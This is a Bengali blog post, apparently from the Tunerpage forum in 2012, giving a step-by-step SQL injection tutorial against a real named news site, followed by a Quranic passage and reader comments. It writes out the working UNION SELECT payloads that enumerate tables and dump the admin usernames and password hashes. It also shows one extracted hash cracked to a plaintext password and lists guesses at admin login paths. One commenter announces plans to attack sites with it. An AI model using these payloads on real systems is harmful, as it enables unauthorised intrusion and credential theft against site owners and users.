আসসালামু আলাইকুম, সবাইকে টিউনারপেজে স্বাগতম। কেমন আছেন সবাই? আশা করি সবাই মহান আল্লাহ তায়ালার অশেষ রহমতে খুবই ভাল আছেন। ভাল থাকুন ও ভাল রাখুন আপনার পাশের মানুষটিকে।
আজ ২০১২ সালের প্রথম দিন। একটি হাসি-কান্না, সুখ-দুঃখ, আনন্দ-বেদনা ময় বছর পেরিয়ে এলাম নতুন একটি বছরে। আর এই নতুন বছরে টিউনারপেজের সকল টিজে, টিজেমেনেটর, ভিজিটর, শুভাকাঙ্খিসহ টিউনারপেজ পরিবারের সবাইকে অনির্বাচিত টিউনার এর পক্ষ থেকে অভিনন্দন ও শুভেচ্ছা। গত সব ধরনের দুঃখময় স্মৃতিগুলো মুছে এবার নতুন পথে ও নতুন উদ্যমে কাজে নেমে পড়ুন সবাই। নতুন বছরে নতুন উদ্যোগ নিয়ে কাজে নেমে পড়ুন।
অনেকদিন ধরে একটা হ্যাকিংয়ের টিউটোরিয়াল লিখবো চিন্তা করলাম। কিন্তু সময় করে উঠতে পারি নাই, তাই লিখতেও পারি নাই। :) আজ তাই একটা ছোট হ্যাকিং টিউটোরিয়াল নিয়ে এসেছি। আজ দেখাবো SQL Injection | লাইভ হ্যাকিং টিউটোরিয়াল। কয়েকদিন পর আরেকটা চরম টিউটোরিয়াল দেখাবো। সবচেয়ে সহজ পদ্ধতিতে Server Rotting টিউটোরিয়াল দেখাবো। আশা করি টিউনারপেজের সাথেই থাকবেন।
SQL injection কি ?
হ্যাকিং করার অনেকগুলো পদ্ধতি আছে। আর এর মধ্যে সবচেয়ে যেটা বেশি জনপ্রিয় সেটা হল SQL. অনেকেই হয়ত জানেন না SQL এর পূর্ণরূপ। SQL এর পূর্ণরূপ হল Structured Query Language. এটা একটি হাই লেভেল ল্যাঙ্গুয়েজ। যেটা মানুষকে স্তব্দ করে দেয়। :) যেমনঃ- select, add data, delete data, update data এর জন্য যথাক্রমে SELECT,INSERT,DELETE,UPDATE কোয়ারিগুলো ব্যবহৃত হয় এখানে। সাধারণত SQL ডাটাবেজ ডিজাইনের জন্য ব্যবহৃত হয়। তথ্য সাধারণত ডাটাবেজে সেভ থাকে। আর SQL injection এর কাজ হল একটি ত্রুটিপূর্ণ এ্যাপ্লিকেশানের ডাটাবেজের ত্রুটি বের করে এখানে আক্রমণ করে ডাটাবেজ দেখা ও ডেটাবেজের সম্পূর্ণ নিয়ন্ত্রণ নিয়ে ফেলা। আর এই ধরনের ডেটাবেজের লিংক দেখতে এমন হয়
www.anything.com/something.php?something=something
যেমনঃ-
www.tartanarmy.com/news/news.php?id=130.
এখানে ১৩০ হল, আমরা ডেটাবেজের ১৩০ পার করেছি। এখন আপনি এই লিংকের একদম শেষে একটি চিহ্ন যোগ করে এটার ত্রুটি বের করবেন। চিহ্নটি হল ( ‘ ) । যেমনঃ-
www.tartanarmy.com/news/news.php?id=130'
তাহলে একটি ইরর দেখাবে।

এবার একটু বেসিক জিনিস দেখেনঃ—–>
প্রত্যেক ডাটাবেজ সার্ভারের উপর ডাটাবেজ আছে। তাই না ?? আবার প্রত্যেক ডেটাবেজের টেবিলও রয়েছে। আবার প্রত্যেকটি টেবিলের রয়েছে বিভিন্ন কলাম। আর এই কলামগুলোতে থাকে ডাটা সংরক্ষিত।


উপরের ছবিতে দেখুন ডাটাবেজ আছে ৬টা আমরা “explore_hacking” ডাটাবেজটা সিলেক্ট করলাম। এটার দেখুন ৪টা টেবিল আছে admin, articles, products, subscribers. প্রতিটি টেবিলের রয়েছে আরও কলাম ও ডেটা। যেমনঃ- আমি ‘admin’ টেবিলটি সিলেক্ট করলাম। এখন দেখূন, এটা রয়ে id, username, password, email কলাম। আর এই সম্পর্কে আরও বিস্তারিত জানতে আমার phpmyadmin টিউটোরিয়াল ও PHP & MySQL টিউটোরিয়ালগুলো দেখূন। তাহলে আরও ভাল করে বুঝতে পারবেন।
information_schema কি ?
এটা হল information database. আর এটি SQL database severs(version>5) এ ডিফল্ট ভাবে থাকে। এখানে সব ধরনের তথ্য সংরক্ষিত থাকে। যেমনঃ- টেবিলের নাম, কলামসহ সব তথ্য।
এখন আমারা “information_schema” ডেটাবেজটি ওপেন করলাম। আর এই ডেটাবেজের টেবিলটির নাম হল “TABLES”
————————————————————————————————————————————————————
এতক্ষণ পর্যন্ত যত বকবক করলাম এটা কিন্তু টিউটোরিয়ালে অংশবিশেষ। এক ঢিলে দুই পাখি মারার ব্যবস্থা করলাম আপনাদের জন্য। এবার আমরা যাবো, মূল টিউটোরিয়ালে। আপনি যাবেন ???? আসেন ঘুরে আসি, কি করা যায়। একদমই বিস্তারিত ভাবে শিখুন। একদমই সহজ পদ্ধতিতে।
————————————————————————————————————————————————————
-: SQL Injection টিউটোরিয়াল :-
প্রথমে এখানে লগইন করুন।
http://www.tartanarmy.com/news/news.php?id=130
শুধু url দিলেই হবে না। এখানের ভ্যালুয়ারেবল কলাম খুঁজে বের করতে হবে। একবার একটা টিউটোরিয়ার শুরু করেছিলাম SQL এর উপর। কিন্তু সেটার ৩ পর্ব লিখে থেকে গিয়ে ছিলাম। কারণ অনেক চিন্তা ভাবনা, সময়সহ আরও অনেক ঝামেলার কারণে সেটা আর করতে পারি নি। কিন্তু চিন্তা আছে সমানে দুটা একসাথে শুরু করবো। BackTrack ও SQL . সাথেই থাকবেন।
কলাম কিভাবে বের করবেনঃ-
এখানে আমারা “ORDER BY” clause ব্যবহার করবো। এটা ব্যবহার করা হয় যাতে sort the columns এর জন্য। এখন যে কোন একটি নাম্বার সিলেক্ট করুন। যেমনঃ- 10. “–” এটি ব্যবহার করা হয়, কমেন্টের পরে কিছু করার জন্য।
এবার url টিতে যান
http://www.tartanarmy.com/news/news.php?id=130 order by 10--
উপরের লিংকটি কপি করে ব্রাউজারে পেষ্ট করুন। অথবা এখানে ক্লিক করুন Click here
মূলত এখানে আমরা ১০টি কলাম নির্দিষ্ট করলাম। যখনই আপনি এটা দিলেন, এটি সাথে সাথে একটি ইরর ম্যাসেজ দিলো, তার মানে এখানে কলাম ১০ টি থেকে কম আছে। এবার 10 এর পরিবর্তে 9 দিন।
http://www.tartanarmy.com/news/news.php?id=130 order by 9--
এখন এটি আবারও ইরর দিলো ! তার মানে এখানও এটা বুঝায় যে, কলাম ৯টির চেয়ে কম আছে। এবার আমরা একটু পন্ডিতি করে 9 এর জায়গায় 6 দিলাম।
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
বাহ এটি ইরর দেয় নি। তার মানে আমরা পেয়ে গেছি। এটি যেহেতু কোন ইরর দেয় নি, তার মানে এটির ৬টি কলাম আছে।
vulnerable columns খুঁজে বের করাঃ-
একটু আগে আমরা যা করলাম তাহল, ডেটাবেজটিতে কয়টি কলাম আছে, তা বের করলাম। এখন আমরা বের করলাম কোন কলামটি vulnerable . এবার আমরা “UNION ALL” ও “SELECT” command ব্যবহার করে দেখবো। 130 এর সামনে একটি ড্যাস চিহ্ন (-) দিন।
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--.
অথবা এখানে ক্লিক করুন Click here
এখানে আমাদের একটি জোড় সংখ্যা পেত হবে। এখন এখানে দেখুন, যে সংখ্যাটি বোল্ড করা সেটি হল vulnerable columns. এখানে 2 নংটি হল vulnerable
database version খুঁজে বের করাঃ-
এবার “@@version” বা “verson()” দিয়ে most vulnerable column টি রিপ্লেস করুন। তবে এখানে প্রথম কমান্ডটি কাজ না করলে পরেরটা হবে।
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6--
অথবা এখানে ক্লিক করুন Click here
তাহলে আপনি আপনার স্ক্রীণে ভার্সন দেখতে পাবেন। ভার্সন পাবেন ৫.something. মানে ৫ থেকে বেশি পাবেন। তবে কিছু কিছু ক্ষেত্র ৫ এর কম হয়, কারণ “information_schema” এ কোন ডেটাবেজ থাকে না।
table names খুঁজে বের করাঃ-
এবার “table_name” এ ভ্যালুয়ারেবল কলাম দিন।
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--
অথবা এখানে ক্লিক করুন Click here
আমরা একটি পেলাম
এবার সকল টেবিল পেতে ব্যবহার করুন group_concat
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
অথবা এখানে ক্লিক করুন Click here
column names খুঁজে বের করাঃ-
এক রকম সকল টেবিল পেতে এটি ব্যবহার করুন ‘table’ with ‘column’
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
অথবা এখানে ক্লিক করুন Click here
আমরা এখন পরিবর্তনে ‘id’ পেলাম। এটা থেকে আমরা জানব যে, কোন টেবিলের কোন কলাম

কলাম থেকে ডাটা নিয়ে আসা
এখন আমরা যে কোন একটি কলাম থেকে ডাটা নিয়ে আসবো। কিন্তু যেটা সবচেয়ে মজার বিষয় সেটা হল username ও password.
এই কলামের প্রথম টেবিল হল tar_admin. এখন আমরা “0x3a” কমান্ডটি ব্যবহার করবো। এটা ব্যবহার করা হয়, যাতে রেজাল্টের একটা সাথে আরেকটা কোলন দিয়ে আলাদা আলাদ থাকে। এটাকে বলে hex of colon.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--.
অথবা এখানে ক্লিক করুন Click Here

তাহলে আমরা ইউজার নেম ও পাসওয়ার্ড পেয়ে যাবো। কিন্তু পাসওয়ার্ড encrypted করা থাকে। বেশির ভাগ encryptions are crackable. এখন যে কোন একটি ইউজারনেম নেন। যেমনঃ- “Sneds”. পাসওয়ার্ড 7d372d3f4ad3116c9e455b20e946dd15 থেকে encrypted করতে হবে।
http://md5crack.com/crackmd5.php
উপরে লিংকে গিয়ে hashed(encrypted) password টি দিন ও ক্র্যাক করে নিন। এখন আমরা পাসওয়ার্ডটি একদমই সহজ ভাষায় পেলাম। আর সেটা হল ‘oorwullie’
ওয়েবসাইটের লগইন পেজ কোথায় পাবো ?
অনেক কষ্টে হ্যাস ক্র্যাক করে পাসওয়ার্ড বের করলাম সাথে ইউজারনেম জোগাড় করলাম। কিন্তু এখন এগুলো দিয়ে উক্ত সাইট ক্র্যাক করবো??? কোন সমস্যা নাই :)
বেশিরভাগ ওয়েবসাইটের লগইন পেজ ডিফল্ট ভাবে এক জায়গায় থাকে। এখন কিছু নমুনা দেখেনঃ——>
www.xyz.com ————————-> www.xyz.com/admin
www.xyz.com ————————-> www.xyz.com/administrator
www.xyz.com ————————-> www.xyz.com/adminlogin
আর যদি কারও খুঁজে পেতে সমস্যা হয়, তাহলে আমার এই টিউটোরিয়ালটি দেখতে পারেন।
এছাড়াও আপনি admin page finder নামের একটা টুলস ব্যবহার করতে পারেন।
ওহ!!!!!!!!!!!! হাঁপিয়ে উঠেছি। কষ্ট হয়ে গেছে। এত বড় একটি টিউটোরিয়াল লিখতে গিয়ে। :( কান্নার ইমো কি জানি ?????? ও মনে পড়েছে
:cry: :cry: :cry: :cry: :cry: :cry: :cry:
—————————————————————————————————
এই টিউটোরিয়ালটি শুধু মাত্র শিখার জন্য। কারও ক্ষতি করার উদ্দ্যেশ্য নয়। তাই এই টিউটোরিয়ালের অপব্যবহারে কেউ ক্ষতির সম্মূখীন হলে টিজে দায়ী নন।
——————————————————————————————————-
সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকুন ও ভাল রাখুন আপনার পাশের মানুষটিকে। আল্লাহ হাফেজ………………
============================================================================
এই আয়াতটির ফযীলত: আলোচ্য আয়াতটি আল কুরআনের সর্বাধিক মর্যাদাশীল আয়াত।
উচ্চারণঃ আল্লাহু লা ইলাহা ইল্লা হুওয়াল হাইয়্যুল ক্বইঊম, লা তা’খুযুহূ
সিনাতুওঁ ওয়া লা নাওম,লাহু মাফিস্ সামাওয়াতি ওয়া মা ফিল আরদ্।
মান যাল্লাযী ইয়াশ্ফাউ ইনদাহূ ইল্লা বি ইযনিহ্। ইয়া’লামু
মা বাইনা আইদীহিম ওয়া মা খালফাহুম, ওয়া লা ইউহীতূনা বিশাইয়িম মিন
ইলমিহী ইল্লা বিমা শাআ, ওয়াসিয়া কুরসিয়্যুহুস
সামাওয়াতি ওয়াল আরদা, ওয়ালা ইয়াঊদুহূ হিফযুহুমা ওয়া হুওয়াল আলিয়্যুল আযীম।
(সূরা বাকারাহ, ২৫৫)
অর্থ: আল্লাহ ছাড়া সত্যিকারের কোন ইলাহ নেই। তিনি চিরঞ্জীবও সব
কিছুর ধারক। তার তন্দ্রা ও আসে না, নিদ্রা ও আসে না। আসমান ও
জমীনে যা কিছু আছে সব তাঁরই। তাঁর অনুমতি ব্যতীত কে আছে যে তাঁর
কাছে সুপারিশ করতে পারে? তাদের সামনে ও পিছনে যা আছে তিনি সবই
জানেন। তারা তাঁর জ্ঞান হতে কিছুই পরিবেষ্টিত করতে পারে না,
তবে তিনি যতটুকু চান। তাঁর কুরসী আকাশ ও জমীন পরিব্যপ্ত
করে আছে। এতদুভয়ের সংরক্ষণ করতে তিনি ক্লান্তিবোধ
করেন না । তিনি হলেন সমুন্নত, মহীয়ান।
[সূরা বাকারাহ -২৫৫]
¤ রাসূলুল্লাহ সা. উবাই ইবনু কাব রাযি. কে প্রশ্ন করেছিলেন,
আল্লাহর কিতাবে র্সবাধিক মর্যাদাশীল আয়াত কোনটি?
তিনি বলেছিলেন, আয়াতুল কুরসী। তখন রাসূল (সা:) তার বুকে হাত
মেরে বলেছিলেন, হে আবুল মুনযির! তোমার জন্য তোমার জ্ঞান আনন্দদায়ক হোক।
[সহীহ মুসলিম-হাদীস : ১৮৮৫]।
¤ যে ব্যক্তি উক্ত আয়াত রাতে পাঠ করবে আল্লাহর পক্ষ থেকে তার সাথে একজন রক্ষণাবেক্ষণকারী ফেরেশতা নিযুক্ত থাকবেন এবং সকাল পর্যন্ত শয়তান তার কাছে আসতে পারেনা।
¤ রাসুলূল্লাহ (সা:) বলেন, প্রত্যেক ফরয নামাযের শেষে আয়াতুল কুরসী পাঠকারীর
জান্নাতে প্রবেশ করার জন্য আর কোন বাধা থাকে না মৃত্যু ব্যতীত। [নাসায়ী]।
↓↓
এমন গুরুত্বপূর্ণ বিষয় বন্ধুদেরকে হাদিয়াস্বরূপ প্রদানের জন্যই আমাদের এই আয়োজন। শেয়ার করে আপনার বন্ধুদের নিকটও হাদিয়াটুকু পৌঁছে দিন।মন একটি সুন্দর লেখা শেয়ার করতে ভুলবেন না।
=========================================================================================
কি বলে মনের ভাব বুঝব রে ভাই
আমি 8 থেকে 9 মাস ঘুরছি hacking শিক্ষার জন্য.
কিছুই পাই নাই, কষ্টে চোখের পানি আর নাকের পানি মুসতে ছিলাম
আর facebook এ girlfriend রে বলতেছিলাম “আমারে দিয়া হইব না”
তখনই TV তে add দেখলাম, হেরা কয় “হবে , তোমারে দিয়াই হবে ”
মানে কৈথেকে জানি tunerpage এর নাম শুনলাম, বিসসাস (বিসসাস বানানে কি ভুল আসে ?) করেন ,
ইছা ছিল না তারপর ও tunerpage এর link এ ক্লিক করছিলাম.
আইসাই যা দেখলাম , আজও খালি দেখতেসি , আর দেখতেসি , শেষ করতে পারতেছিনা.
এই কমেন্ট এর উদ্দেসো একটাই, “সকল TJ ভাই / বোনদের / আর বাকি যারা যারা আসে …. সবাইকে অসংখ ধন্যবাদ, ”
seriously অনেক ধন্যবাদ আপনাদের সবাইকে , আমাকে আবার আশাবাদী করার জন্য.
ধন্যবাদ অনির্বাচিত টিউনার ভাই.
আপনার / আপনাদের কাছ থেকে যা যা শিখেছি তা দিয়ে আমার মত কিছু হতাসাগ্রস্থ CSE student দের বলার সুযোগ করে দিয়েসেন “আমার নাম নাহিদ আর আমি মফিজ না ”
বি: দ্র: নাহিদ০১০৫ , relational status : Single
লিংক গুলো তো কাজ করে না ।। অনির্বাচিত টিউনার ভাই, একটু দেখেন প্লিজ ।।
ভাইয়া আমার মাথায় কিসুই ঢুকে নাই . সব লিঙ্ক এ page এরর দেখাইতেসে
avatar
অনির্বাচিত টিউনার, খুবই ভালো হয়েছে।
ধন্যবাদ(মনে হই কম হলো ) অনির্বাচিত টিউনার….
খোব ভালো টিউন । কাজে আসবে কিনটু আরো বিসটারিটও হোলে ভালো হোয়
http://messageonanecklace.com/articles/unique_gift_ideas.html
Anchor Text: unique gifts
কোন কথা না বলে সোজা প্রিয়তে পাঠিয়ে দিলাম , একদিন সময় করে দেখব এর ফজিলত …হাহহাহা
অনেক অনেক ধন্যবাদ অনির্বাচিত টিউনার ভাইয়া …
*★ 。”’ ★* *★
*.˛.°★。˛°.★** *★* *˛
˛°_██_*。*./ .˛* .˛.*.★* *★ 。**.★* *★
˛. (´• ̮•)*˛°*/.♫.♫*˛.* ˛_Π_____. * ˛*
.°( . • . ) ˛°./• ‘♫ ‘ •.˛*./______/~\*. ˛*.。˛* ˛. *。
*(…’•’.. ) *˛╬╬╬╬╬˛°.|田田 |門|╬╬╬╬……
˚░H░A░ P░ P░Y░░ N░ E ░W ░Y░ E░ A░ R░ !░ !░2░0 ░1░2░✰
বাহ অনেক ধন্যবাদ আপনাকে.
আপনার জ্ঞানের ভান্ডার থেকে আমাদের কিছু দেয়ার জন্য ধন্যবাদ।
Traffic Exchange করে আপনার সাইটে ভিজিটর আনুন (Screenshot সহ)
চমৎকার টিউন বস :) :D
আমার মাথা ঘুরতাছে……
চরম টিউন ।।। ধন্যবাদ ।।।
আপনাকেও ধন্যবাদ পৃথিবী ভাই :)
আমার মাথার উপর দিয়ে সব গেলো… :(
আমাকে ডিজাইন শিখান!! :D :P
হা হা হা হা হা। মাথার নিচ দিয়া যায় নাই :P
ডিজাইন শিখার জন্য আপনাকে আগে কি কাজ করতে হবে। তাহলেই শিখাবো। ম্যাসেজ দিবো আপনাকে। হ্যাকিং শিখতে থাকুন
প্রথমে ভাবলাম বছরের প্রথম টিউনটাই হ্যাকিং দিয়ে শুরু ।পুরোটা পড়ার পর এখন বলতে ইচ্ছে হচ্ছে বছরে শুরুটা এর চেয়ে আর ভালো ভাবে শুরু করা যায় না ।
আসলে কালকে এই পোষ্ট লিখতে চিন্তা করলাম ৩ ঘন্টা লাগবে, পরে দেখি ১ ঘন্টায় লিখে ফেলেছি :) কি বলবো হ্যাকিং টিউটোরিয়াল লেখা অনেক কষ্টের। যাক আমি দুঃখিত এই রকম একটি পোষ্ট দিয়ে শুরু করার জন্য :P
আর এটি পাবলিশ হয়েছে
এই পোস্ট টি লেখা হয়েছে রবিবার, জানুয়ারি 1st, 2012 (10 ঘন্টা আগে লিখেছেন) লেখার সময় 12:01 পুর্বাহ্ন
ভাই চরম হইছে। এতো সুন্দর টিউন করেন কেম্নেরে ভাই…………………।মাথাই আশে না……………
হা হা হা হা। ধন্যবাদ টিউনারপেজের সাথেই থাকুন :)
আপনার পোস্ট সবসময় চরম হয়, তাই আর বললাম না, কিন্তু আপনার ফিচার ইমেজ চরম+++++++++++++++++++++++++ হইসে।
+++++++++++++++++++++++++++++++++++++++++
দারু এবং…….. ব্যসম্ভব সুন্দর পোস্ট………….
HappY New year ………..
ধন্য+++++++++++++++
আপনাকেও ইংরেজি নববর্ষের শুভেচ্ছা। ++++++++++++++++++++++++++
অসাধারণ একটা টিউন, এই সিস্টেম এ আপনার সাইট হ্যাক করার ট্রাই করতেছি আগামীকাল টিউনারপেজেও ট্রাই করবো :D
হাহাহাহাহ……..সফল হইলে জানায়েন./……
রাসেল ১৩ পারলে করো তো। বহুত ভাব মারলা মনে হয় :P
টিউনারপেজ বা আমারটা মারতে পারলে তোমার জন্য পুরষ্কার আছে :) পুরষ্কারটা পরে কইমু :)
হা হা হা :)